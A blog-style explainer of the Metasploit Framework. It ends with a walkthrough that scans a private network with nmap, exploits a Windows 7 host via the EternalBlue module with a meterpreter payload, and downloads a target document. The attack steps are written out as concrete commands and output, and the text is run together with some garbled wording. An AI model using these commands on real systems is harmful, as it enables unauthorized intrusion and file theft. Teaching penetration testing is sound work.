---
title: What is the Metasploit Framework and how is it used?
date: Wed, 26 May 2021 12:05:00 +0000
---
The Metasploit Framework is a potent tool that cybercriminals can use as well as ethical hackers to probe systematic vulnerabilities on networks, systems, and servers. It is an open-source framework that is easily customizable and used in most operating systems. The Metasploit framework is licensed by Rapid7 since 2009 and has become the go-to framework for exploit development and mitigation tactics. The software is popular with hackers and widely available, which reinforces the need for security professionals to become familiar with the framework even if they don’t use it.Metasploit now includes more than 2000+ exploits organized over 25 platforms, including Android, PHP, Python, Java, Cisco, and more. The framework also carries more than 500+ payloads, some of which include:Command shell payloads that enable users to run scripts or random commands against a host.Dynamic payloads that allow testers to generate unique payloads to evade antivirus software.Meterpreter payloads allow users to abduct device monitors using VMC and take over sessions or upload and download files.Static payloads that enable port forwarding and communications between networks.An example of the working with the Metasploit-Framework:Exploiting a Windows 7 machine using Metasploit. Strategy: Compromise a Windows 7 machine in order to locate and exfiltrate ‘target.docx’ file. Tactics: Performing a network scan. Analyzing the scan output in order to identify the Windows 7 machine. Gain access to the machine using the ‘EternalBlue’ exploit. Locate the target file on the machine. Exfiltrate the file. Operationally: Run nmap in order to identify Windows 7. sudo nmap 192.168.42.2-110Identified the active IP addresses.192.168.42.34Host is up (0.031s latency).Linux unconfirmedWeb server unconfirmed192.168.42.42Windows 7 Professional confirmedWorkstation unconfirmed192.168.42.49Host is up (0.036s latency).All 1000 scanned ports on 192.168.42.49 are filteredLinux unconfirmedWorkstation unconfirmed192.168.42.59Linux unconfirmedWorkstation unconfirmed192.168.42.63Windows Server 2008R2 Standard SP1 confirmedUnconfigured unconfirmed192.168.42.100Windows server 2016 confirmedAD Server unconfirmed Gain Access using eternalblue exploit. msf5 auxiliary(scanner/smb/smb_version) > useexploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.42.42RHOST => 192.168.42.42msf5 exploit(windows/smb/ms17_010_eternalblue) > set payloadwindows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > exploitmeterpreter exploit windows/smb/ms17_010_eternalblue againstRHOST 192.168.42.42 with payload windows/x64/meterpreter/bind_tcpexploitation was successful & access was gained. Locate target file on machinemeterpreter search -f target.docxExfiltrate the filemeterpreter download C:\\Users\\User\\Desktop\target.docxThe file was downloaded successfully.